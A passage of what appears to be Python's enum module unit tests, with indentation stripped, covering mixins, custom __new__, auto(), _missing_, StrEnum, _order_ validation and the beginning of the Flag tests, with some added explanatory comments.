self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_tuple_subclass(self):
class SomeTuple(tuple, Enum):
__qualname__ = 'SomeTuple' # needed for pickle protocol 4
first = (1, 'for the money')
second = (2, 'for the show')
third = (3, 'for the music')
self.assertIs(type(SomeTuple.first), SomeTuple)
self.assertIsInstance(SomeTuple.second, tuple)
self.assertEqual(SomeTuple.third, (3, 'for the music'))
globals()['SomeTuple'] = SomeTuple
test_pickle_dump_load(self.assertIs, SomeTuple.first)
def test_duplicate_values_give_unique_enum_items(self):
class AutoNumber(Enum):
first = ()
second = ()
third = ()
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
self.assertEqual(
list(AutoNumber),
[AutoNumber.first, AutoNumber.second, AutoNumber.third],
)
self.assertEqual(int(AutoNumber.second), 2)
self.assertEqual(AutoNumber.third.value, 3)
self.assertIs(AutoNumber(1), AutoNumber.first)
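# Note: first, second and third are all written as (), yet they do not collapse into
# aliases because the custom __new__ hands each one a fresh _value_
# (len(cls.__members__) + 1), so the values the metaclass compares are all distinct.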
def test_inherited_new_from_enhanced_enum(self):
class AutoNumber(Enum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_inherited_new_from_mixed_enum(self):
class AutoNumber(IntEnum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = int.__new__(cls, value)
obj._value_ = value
return obj
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_equality(self):
class OrdinaryEnum(Enum):
a = 1
self.assertEqual(ALWAYS_EQ, OrdinaryEnum.a)
self.assertEqual(OrdinaryEnum.a, ALWAYS_EQ)
def test_ordered_mixin(self):
class OrderedEnum(Enum):
def __ge__(self, other):
if self.__class__ is other.__class__:
return self._value_ >= other._value_
return NotImplemented
def __gt__(self, other):
if self.__class__ is other.__class__:
return self._value_ > other._value_
return NotImplemented
def __le__(self, other):
if self.__class__ is other.__class__:
return self._value_ <= other._value_
return NotImplemented
def __lt__(self, other):
if self.__class__ is other.__class__:
return self._value_ < other._value_
return NotImplemented
class Grade(OrderedEnum):
A = 5
B = 4
C = 3
D = 2
F = 1
self.assertGreater(Grade.A, Grade.B)
self.assertLessEqual(Grade.F, Grade.C)
self.assertLess(Grade.D, Grade.A)
self.assertGreaterEqual(Grade.B, Grade.B)
self.assertEqual(Grade.B, Grade.B)
self.assertNotEqual(Grade.C, Grade.D)
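# Note: Enum members are not orderable by default (only equality and identity work),
# so a mixin like OrderedEnum restores <, <=, > and >= by comparing _value_ while
# still returning NotImplemented for members of a different enum class.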
def test_extending2(self):
class Shade(Enum):
def shade(self):
print(self.name)
class Color(Shade):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
def test_extending3(self):
class Shade(Enum):
def shade(self):
return self.name
class Color(Shade):
def hex(self):
return '%s hexlified!' % self.value
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!')
def test_subclass_duplicate_name(self):
class Base(Enum):
def test(self):
pass
class Test(Base):
test = 1
self.assertIs(type(Test.test), Test)
def test_subclass_duplicate_name_dynamic(self):
from types import DynamicClassAttribute
class Base(Enum):
@DynamicClassAttribute
def test(self):
return 'dynamic'
class Test(Base):
test = 1
self.assertEqual(Test.test.test, 'dynamic')
class Base2(Enum):
@enum.property
def flash(self):
return 'flashy dynamic'
class Test(Base2):
flash = 1
self.assertEqual(Test.flash.flash, 'flashy dynamic')
def test_no_duplicates(self):
class UniqueEnum(Enum):
def __init__(self, *args):
cls = self.__class__
if any(self.value == e.value for e in cls):
a = self.name
e = cls(self.value).name
raise ValueError(
"aliases not allowed in UniqueEnum: %r --> %r"
% (a, e)
)
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
grene = 2
def test_init(self):
class Planet(Enum):
MERCURY = (3.303e+23, 2.4397e6)
VENUS = (4.869e+24, 6.0518e6)
EARTH = (5.976e+24, 6.37814e6)
MARS = (6.421e+23, 3.3972e6)
JUPITER = (1.9e+27, 7.1492e7)
SATURN = (5.688e+26, 6.0268e7)
URANUS = (8.686e+25, 2.5559e7)
NEPTUNE = (1.024e+26, 2.4746e7)
def __init__(self, mass, radius):
self.mass = mass # in kilograms
self.radius = radius # in meters
@property
def surface_gravity(self):
# universal gravitational constant (m^3 kg^-1 s^-2)
G = 6.67300E-11
return G * self.mass / (self.radius * self.radius)
self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.80)
self.assertEqual(Planet.EARTH.value, (5.976e+24, 6.37814e6))
def test_ignore(self):
class Period(timedelta, Enum):
'''
different lengths of time
'''
def __new__(cls, value, period):
obj = timedelta.__new__(cls, value)
obj._value_ = value
obj.period = period
return obj
_ignore_ = 'Period i'
Period = vars()
for i in range(13):
Period['month_%d' % i] = i*30, 'month'
for i in range(53):
Period['week_%d' % i] = i*7, 'week'
for i in range(32):
Period['day_%d' % i] = i, 'day'
OneDay = day_1
OneWeek = week_1
OneMonth = month_1
self.assertFalse(hasattr(Period, '_ignore_'))
self.assertFalse(hasattr(Period, 'Period'))
self.assertFalse(hasattr(Period, 'i'))
self.assertTrue(isinstance(Period.day_1, timedelta))
self.assertTrue(Period.month_1 is Period.day_30)
self.assertTrue(Period.week_4 is Period.day_28)
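# Note: _ignore_ names class-body helpers that must not become members; here the
# scratch dict 'Period' (captured via vars()) and the loop variable 'i' are removed
# from the finished class, which is what the hasattr checks above verify.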
def test_nonhash_value(self):
class AutoNumberInAList(Enum):
def __new__(cls):
value = [len(cls.__members__) + 1]
obj = object.__new__(cls)
obj._value_ = value
return obj
class ColorInAList(AutoNumberInAList):
red = ()
green = ()
blue = ()
self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue])
for enum, value in zip(ColorInAList, range(3)):
value += 1
self.assertEqual(enum.value, [value])
self.assertIs(ColorInAList([value]), enum)
def test_conflicting_types_resolved_in_new(self):
class LabelledIntEnum(int, Enum):
def __new__(cls, *args):
value, label = args
obj = int.__new__(cls, value)
obj.label = label
obj._value_ = value
return obj
class LabelledList(LabelledIntEnum):
unprocessed = (1, "Unprocessed")
payment_complete = (2, "Payment Complete")
self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete])
self.assertEqual(LabelledList.unprocessed, 1)
self.assertEqual(LabelledList(1), LabelledList.unprocessed)
def test_auto_number(self):
class Color(Enum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_name(self):
class Color(Enum):
def _generate_next_value_(name, start, count, last):
return name
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_name_inherit(self):
class AutoNameEnum(Enum):
def _generate_next_value_(name, start, count, last):
return name
class Color(AutoNameEnum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
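# Note: auto() delegates to _generate_next_value_, which receives the member name,
# the start value, the number of members so far, and the values assigned so far;
# overriding it to return the name (as above) makes every auto() value equal its
# member name, and the override is inherited by subclasses such as Color.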
def test_auto_garbage(self):
class Color(Enum):
red = 'red'
blue = auto()
self.assertEqual(Color.blue.value, 1)
def test_auto_garbage_corrected(self):
class Color(Enum):
red = 'red'
blue = 2
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_order(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = auto()
green = auto()
blue = auto()
def _generate_next_value_(name, start, count, last):
return name
def test_auto_order_weird(self):
weird_auto = auto()
weird_auto.value = 'pathological case'
class Color(Enum):
red = weird_auto
def _generate_next_value_(name, start, count, last):
return name
blue = auto()
self.assertEqual(list(Color), [Color.red, Color.blue])
self.assertEqual(Color.red.value, 'pathological case')
self.assertEqual(Color.blue.value, 'blue')
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_default_missing(self):
class Color(Enum):
RED = 1
GREEN = 2
BLUE = 3
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
def test_missing(self):
class Color(Enum):
red = 1
green = 2
blue = 3
@classmethod
def _missing_(cls, item):
if item == 'three':
return cls.blue
elif item == 'bad return':
# trigger internal error
return 5
elif item == 'error out':
raise ZeroDivisionError
else:
# trigger not found
return None
self.assertIs(Color('three'), Color.blue)
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
try:
Color('bad return')
except TypeError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
try:
Color('error out')
except ZeroDivisionError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
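# Note: _missing_ is the fallback hook for failed value lookups. Returning a member
# satisfies the lookup, returning None produces the usual ValueError, returning any
# other object raises TypeError chained to that ValueError, and an exception raised
# inside _missing_ propagates with the ValueError as its __context__; those are the
# four branches exercised above.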
def test_missing_exceptions_reset(self):
import gc
import weakref
#
class TestEnum(enum.Enum):
VAL1 = 'val1'
VAL2 = 'val2'
#
class Class1:
def __init__(self):
# Gracefully handle an exception of our own making
try:
raise ValueError()
except ValueError:
pass
#
class Class2:
def __init__(self):
# Gracefully handle an exception of Enum's making
try:
TestEnum('invalid_value')
except ValueError:
pass
# No strong refs here so these are free to die.
class_1_ref = weakref.ref(Class1())
class_2_ref = weakref.ref(Class2())
#
# The exception raised by Enum creates a reference loop and thus
# Class2 instances will stick around until the next garbage collection
# cycle, unlike Class1.
gc.collect() # For PyPy or other GCs.
self.assertIs(class_1_ref(), None)
self.assertIs(class_2_ref(), None)
def test_multiple_mixin(self):
class MaxMixin:
@classproperty
def MAX(cls):
max = len(cls)
cls.MAX = max
return max
class StrMixin:
def __str__(self):
return self._name_.lower()
class SomeEnum(Enum):
def behavior(self):
return 'booyah'
class AnotherEnum(Enum):
def behavior(self):
return 'nuhuh!'
def social(self):
return "what's up?"
class Color(MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(MaxMixin, StrMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class CoolColor(StrMixin, SomeEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolColor.RED.value, 1)
self.assertEqual(CoolColor.GREEN.value, 2)
self.assertEqual(CoolColor.BLUE.value, 3)
self.assertEqual(str(CoolColor.BLUE), 'blue')
self.assertEqual(CoolColor.RED.behavior(), 'booyah')
class CoolerColor(StrMixin, AnotherEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolerColor.RED.value, 1)
self.assertEqual(CoolerColor.GREEN.value, 2)
self.assertEqual(CoolerColor.BLUE.value, 3)
self.assertEqual(str(CoolerColor.BLUE), 'blue')
self.assertEqual(CoolerColor.RED.behavior(), 'nuhuh!')
self.assertEqual(CoolerColor.RED.social(), "what's up?")
class CoolestColor(StrMixin, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolestColor.RED.value, 1)
self.assertEqual(CoolestColor.GREEN.value, 2)
self.assertEqual(CoolestColor.BLUE.value, 3)
self.assertEqual(str(CoolestColor.BLUE), 'blue')
self.assertEqual(CoolestColor.RED.behavior(), 'booyah')
self.assertEqual(CoolestColor.RED.social(), "what's up?")
class ConfusedColor(StrMixin, AnotherEnum, SomeEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ConfusedColor.RED.value, 1)
self.assertEqual(ConfusedColor.GREEN.value, 2)
self.assertEqual(ConfusedColor.BLUE.value, 3)
self.assertEqual(str(ConfusedColor.BLUE), 'blue')
self.assertEqual(ConfusedColor.RED.behavior(), 'nuhuh!')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
class ReformedColor(StrMixin, IntEnum, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ReformedColor.RED.value, 1)
self.assertEqual(ReformedColor.GREEN.value, 2)
self.assertEqual(ReformedColor.BLUE.value, 3)
self.assertEqual(str(ReformedColor.BLUE), 'blue')
self.assertEqual(ReformedColor.RED.behavior(), 'booyah')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
self.assertTrue(issubclass(ReformedColor, int))
def test_multiple_inherited_mixin(self):
@unique
class Decision1(StrEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
class MyEnum(StrEnum):
pass
@unique
class Decision2(MyEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
def test_multiple_mixin_inherited(self):
class MyInt(int):
def __new__(cls, value):
return super().__new__(cls, value)
class HexMixin:
def __repr__(self):
return hex(self)
class MyIntEnum(HexMixin, MyInt, enum.Enum):
pass
class Foo(MyIntEnum):
TEST = 1
self.assertTrue(isinstance(Foo.TEST, MyInt))
self.assertEqual(repr(Foo.TEST), "0x1")
class Fee(MyIntEnum):
TEST = 1
def __new__(cls, value):
value += 1
member = int.__new__(cls, value)
member._value_ = value
return member
self.assertEqual(Fee.TEST, 2)
def test_multiple_mixin_with_common_data_type(self):
class CaseInsensitiveStrEnum(str, Enum):
@classmethod
def _missing_(cls, value):
for member in cls._member_map_.values():
if member._value_.lower() == value.lower():
return member
return super()._missing_(value)
#
class LenientStrEnum(str, Enum):
def __init__(self, *args):
self._valid = True
@classmethod
def _missing_(cls, value):
unknown = cls._member_type_.__new__(cls, value)
unknown._valid = False
unknown._name_ = value.upper()
unknown._value_ = value
cls._member_map_[value] = unknown
return unknown
@property
def valid(self):
return self._valid
#
class JobStatus(CaseInsensitiveStrEnum, LenientStrEnum):
ACTIVE = "active"
PENDING = "pending"
TERMINATED = "terminated"
#
JS = JobStatus
self.assertEqual(list(JobStatus), [JS.ACTIVE, JS.PENDING, JS.TERMINATED])
self.assertEqual(JS.ACTIVE, 'active')
self.assertEqual(JS.ACTIVE.value, 'active')
self.assertIs(JS('Active'), JS.ACTIVE)
self.assertTrue(JS.ACTIVE.valid)
missing = JS('missing')
self.assertEqual(list(JobStatus), [JS.ACTIVE, JS.PENDING, JS.TERMINATED])
self.assertEqual(JS.ACTIVE, 'active')
self.assertEqual(JS.ACTIVE.value, 'active')
self.assertIs(JS('Active'), JS.ACTIVE)
self.assertTrue(JS.ACTIVE.valid)
self.assertTrue(isinstance(missing, JS))
self.assertFalse(missing.valid)
def test_empty_globals(self):
# bpo-35717: sys._getframe(2).f_globals['__name__'] fails with KeyError
# when using compile and exec because f_globals is empty
code = "from enum import Enum; Enum('Animal', 'ANT BEE CAT DOG')"
code = compile(code, "<string>", "exec")
global_ns = {}
local_ls = {}
exec(code, global_ns, local_ls)
def test_strenum(self):
class GoodStrEnum(StrEnum):
one = '1'
two = '2'
three = b'3', 'ascii'
four = b'4', 'latin1', 'strict'
self.assertEqual(GoodStrEnum.one, '1')
self.assertEqual(str(GoodStrEnum.one), '1')
self.assertEqual('{}'.format(GoodStrEnum.one), '1')
self.assertEqual(GoodStrEnum.one, str(GoodStrEnum.one))
self.assertEqual(GoodStrEnum.one, '{}'.format(GoodStrEnum.one))
self.assertEqual(repr(GoodStrEnum.one), 'GoodStrEnum.one')
#
class DumbMixin:
def __str__(self):
return "don't do this"
class DumbStrEnum(DumbMixin, StrEnum):
five = '5'
six = '6'
seven = '7'
self.assertEqual(DumbStrEnum.seven, '7')
self.assertEqual(str(DumbStrEnum.seven), "don't do this")
#
class EnumMixin(Enum):
def hello(self):
print('hello from %s' % (self, ))
class HelloEnum(EnumMixin, StrEnum):
eight = '8'
self.assertEqual(HelloEnum.eight, '8')
self.assertEqual(HelloEnum.eight, str(HelloEnum.eight))
#
class GoodbyeMixin:
def goodbye(self):
print('%s wishes you a fond farewell' % (self, ))
class GoodbyeEnum(GoodbyeMixin, EnumMixin, StrEnum):
nine = '9'
self.assertEqual(GoodbyeEnum.nine, '9')
self.assertEqual(GoodbyeEnum.nine, str(GoodbyeEnum.nine))
#
with self.assertRaisesRegex(TypeError, '1 is not a string'):
class FirstFailedStrEnum(StrEnum):
one = 1
two = '2'
with self.assertRaisesRegex(TypeError, "2 is not a string"):
class SecondFailedStrEnum(StrEnum):
one = '1'
two = 2,
three = '3'
with self.assertRaisesRegex(TypeError, '2 is not a string'):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = 2
with self.assertRaisesRegex(TypeError, 'encoding must be a string, not %r' % (sys.getdefaultencoding, )):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = b'2', sys.getdefaultencoding
with self.assertRaisesRegex(TypeError, 'errors must be a string, not 9'):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = b'2', 'ascii', 9
@unittest.skipIf(
python_version >= (3, 12),
'mixin-format now uses member instead of member.value',
)
def test_custom_strenum_with_warning(self):
class CustomStrEnum(str, Enum):
pass
class OkayEnum(CustomStrEnum):
one = '1'
two = '2'
three = b'3', 'ascii'
four = b'4', 'latin1', 'strict'
self.assertEqual(OkayEnum.one, '1')
self.assertEqual(str(OkayEnum.one), 'one')
with self.assertWarns(DeprecationWarning):
self.assertEqual('{}'.format(OkayEnum.one), '1')
self.assertEqual(OkayEnum.one, '{}'.format(OkayEnum.one))
self.assertEqual(repr(OkayEnum.one), 'OkayEnum.one')
#
class DumbMixin:
def __str__(self):
return "don't do this"
class DumbStrEnum(DumbMixin, CustomStrEnum):
five = '5'
six = '6'
seven = '7'
self.assertEqual(DumbStrEnum.seven, '7')
self.assertEqual(str(DumbStrEnum.seven), "don't do this")
#
class EnumMixin(Enum):
def hello(self):
print('hello from %s' % (self, ))
class HelloEnum(EnumMixin, CustomStrEnum):
eight = '8'
self.assertEqual(HelloEnum.eight, '8')
self.assertEqual(str(HelloEnum.eight), 'eight')
#
class GoodbyeMixin:
def goodbye(self):
print('%s wishes you a fond farewell' % (self, ))
class GoodbyeEnum(GoodbyeMixin, EnumMixin, CustomStrEnum):
nine = '9'
self.assertEqual(GoodbyeEnum.nine, '9')
self.assertEqual(str(GoodbyeEnum.nine), 'nine')
#
class FirstFailedStrEnum(CustomStrEnum):
one = 1 # this will become '1'
two = '2'
class SecondFailedStrEnum(CustomStrEnum):
one = '1'
two = 2, # this will become '2'
three = '3'
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = 2 # this will become '2'
with self.assertRaisesRegex(TypeError, '.encoding. must be str, not '):
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = b'2', sys.getdefaultencoding
with self.assertRaisesRegex(TypeError, '.errors. must be str, not '):
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = b'2', 'ascii', 9
@unittest.skipIf(
python_version < (3, 12),
'mixin-format currently uses member.value',
)
def test_custom_strenum(self):
class CustomStrEnum(str, Enum):
pass
class OkayEnum(CustomStrEnum):
one = '1'
two = '2'
three = b'3', 'ascii'
four = b'4', 'latin1', 'strict'
self.assertEqual(OkayEnum.one, '1')
self.assertEqual(str(OkayEnum.one), 'one')
self.assertEqual('{}'.format(OkayEnum.one), 'one')
self.assertEqual(repr(OkayEnum.one), 'OkayEnum.one')
#
class DumbMixin:
def __str__(self):
return "don't do this"
class DumbStrEnum(DumbMixin, CustomStrEnum):
five = '5'
six = '6'
seven = '7'
self.assertEqual(DumbStrEnum.seven, '7')
self.assertEqual(str(DumbStrEnum.seven), "don't do this")
#
class EnumMixin(Enum):
def hello(self):
print('hello from %s' % (self, ))
class HelloEnum(EnumMixin, CustomStrEnum):
eight = '8'
self.assertEqual(HelloEnum.eight, '8')
self.assertEqual(str(HelloEnum.eight), 'eight')
#
class GoodbyeMixin:
def goodbye(self):
print('%s wishes you a fond farewell' % (self, ))
class GoodbyeEnum(GoodbyeMixin, EnumMixin, CustomStrEnum):
nine = '9'
self.assertEqual(GoodbyeEnum.nine, '9')
self.assertEqual(str(GoodbyeEnum.nine), 'nine')
#
class FirstFailedStrEnum(CustomStrEnum):
one = 1 # this will become '1'
two = '2'
class SecondFailedStrEnum(CustomStrEnum):
one = '1'
two = 2, # this will become '2'
three = '3'
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = 2 # this will become '2'
with self.assertRaisesRegex(TypeError, '.encoding. must be str, not '):
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = b'2', sys.getdefaultencoding
with self.assertRaisesRegex(TypeError, '.errors. must be str, not '):
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = b'2', 'ascii', 9
def test_missing_value_error(self):
with self.assertRaisesRegex(TypeError, "_value_ not set in __new__"):
class Combined(str, Enum):
#
def __new__(cls, value, sequence):
enum = str.__new__(cls, value)
if '(' in value:
fis_name, segment = value.split('(', 1)
segment = segment.strip(' )')
else:
fis_name = value
segment = None
enum.fis_name = fis_name
enum.segment = segment
enum.sequence = sequence
return enum
#
def __repr__(self):
return "<%s.%s>" % (self.__class__.__name__, self._name_)
#
key_type = 'An$(1,2)', 0
company_id = 'An$(3,2)', 1
code = 'An$(5,1)', 2
description = 'Bn$', 3
@unittest.skipUnless(
python_version == (3, 9),
'private variables are now normal attributes',
)
def test_warning_for_private_variables(self):
with self.assertWarns(DeprecationWarning):
class Private(Enum):
__corporal = 'Radar'
self.assertEqual(Private._Private__corporal.value, 'Radar')
try:
with self.assertWarns(DeprecationWarning):
class Private(Enum):
__major_ = 'Hoolihan'
except ValueError:
pass
def test_private_variable_is_normal_attribute(self):
class Private(Enum):
__corporal = 'Radar'
__major_ = 'Hoolihan'
self.assertEqual(Private._Private__corporal, 'Radar')
self.assertEqual(Private._Private__major_, 'Hoolihan')
@unittest.skipUnless(
python_version < (3, 12),
'member-member access now raises an exception',
)
def test_warning_for_member_from_member_access(self):
with self.assertWarns(DeprecationWarning):
class Di(Enum):
YES = 1
NO = 0
nope = Di.YES.NO
self.assertIs(Di.NO, nope)
@unittest.skipUnless(
python_version >= (3, 12),
'member-member access currently issues a warning',
)
def test_exception_for_member_from_member_access(self):
with self.assertRaisesRegex(AttributeError, "Di: no instance attribute .NO."):
class Di(Enum):
YES = 1
NO = 0
nope = Di.YES.NO
def test_strenum_auto(self):
class Strings(StrEnum):
ONE = auto()
TWO = auto()
self.assertEqual([Strings.ONE, Strings.TWO], ['one', 'two'])
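# Note: StrEnum overrides _generate_next_value_ to return the lower-cased member
# name, so auto() here yields the strings 'one' and 'two' rather than integers.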
def test_dynamic_members_with_static_methods(self):
#
foo_defines = {'FOO_CAT': 'aloof', 'BAR_DOG': 'friendly', 'FOO_HORSE': 'big'}
class Foo(Enum):
vars().update({
k: v
for k, v in foo_defines.items()
if k.startswith('FOO_')
})
def upper(self):
return self.value.upper()
self.assertEqual(list(Foo), [Foo.FOO_CAT, Foo.FOO_HORSE])
self.assertEqual(Foo.FOO_CAT.value, 'aloof')
self.assertEqual(Foo.FOO_HORSE.upper(), 'BIG')
#
with self.assertRaisesRegex(TypeError, "'FOO_CAT' already defined as: 'aloof'"):
class FooBar(Enum):
vars().update({
k: v
for k, v in foo_defines.items()
if k.startswith('FOO_')
},
**{'FOO_CAT': 'small'},
)
def upper(self):
return self.value.upper()
class TestOrder(unittest.TestCase):
def test_same_members(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
def test_same_members_with_aliases(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
verde = green
def test_same_members_wrong_order(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
blue = 3
green = 2
def test_order_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
def test_order_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
verde = green
def test_enum_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
def test_enum_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
verde = green
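# Note: _order_ is a space-separated listing of the member names, kept mainly for
# compatibility with code written for enum34 on Python 2; on Python 3 it is only
# checked against the real definition order (aliases excluded), and any mismatch
# raises TypeError as the tests above demonstrate.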
class TestFlag(unittest.TestCase):
"""Tests of the Flags."""
class Perm(Flag):
R, W, X = 4, 2, 1
class Open(Flag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(Flag):
BLACK = 0
RED = 1
ROJO = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
WHITE = RED|GREEN|BLUE
BLANCO = RED|GREEN|BLUE
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'R')
self.assertEqual(str(Perm.W), 'W')
self.assertEqual(str(Perm.X), 'X')
self.assertEqual(str(Perm.R | Perm.W), 'R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'R|W|X')
self.assertEqual(str(Perm(0)), 'Perm(0)')
self.assertEqual(str(~Perm.R), 'W|X')
self.assertEqual(str(~Perm.W), 'R|X')
self.assertEqual(str(~Perm.X), 'R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm(0)')
self.assertEqual(str(Perm(~0)), 'R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'RO')
self.assertEqual(str(Open.WO), 'WO')
self.assertEqual(str(Open.AC), 'AC')
self.assertEqual(str(Open.RO | Open.CE), 'CE')
self.assertEqual(str(Open.WO | Open.CE), 'WO|CE')
self.assertEqual(str(~Open.RO), 'WO|RW|CE')
self.assertEqual(str(~Open.WO), 'RW|CE')
self.assertEqual(str(~Open.AC), 'CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'RW')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), 'Perm.R')
self.assertEqual(repr(Perm.W), 'Perm.W')
self.assertEqual(repr(Perm.X), 'Perm.X')
self.assertEqual(repr(Perm.R | Perm.W), 'Perm.R|Perm.W')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm(0)), '0x0')
self.assertEqual(repr(~Perm.R), 'Perm.W|Perm.X')
self.assertEqual(repr(~Perm.W), 'Perm.R|Perm.X')
self.assertEqual(repr(~Perm.X), 'Perm.R|Perm.W')
self.assertEqual(repr(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '0x0')
self.assertEqual(repr(Perm(~0)), 'Perm.R|Perm.W|Perm.X')
Open = self.Open
self.assertEqual(repr(Open.RO), 'Open.RO')
self.assertEqual(repr(Open.WO), 'Open.WO')
self.assertEqual(repr(Open.AC), 'Open.AC')
self.assertEqual(repr(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(repr(Open.WO | Open.CE), 'Open.WO|Open.CE')
self.assertEqual(repr(~Open.RO), 'Open.WO|Open.RW|Open.CE')
self.assertEqual(repr(~Open.WO), 'Open.RW|Open.CE')
self.assertEqual(repr(~Open.AC), 'Open.CE')
self.assertEqual(repr(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(repr(~(Open.WO | Open.CE)), 'Open.RW')
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), 'R')
self.assertEqual(format(Perm.R | Perm.X, ''), 'R|X')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
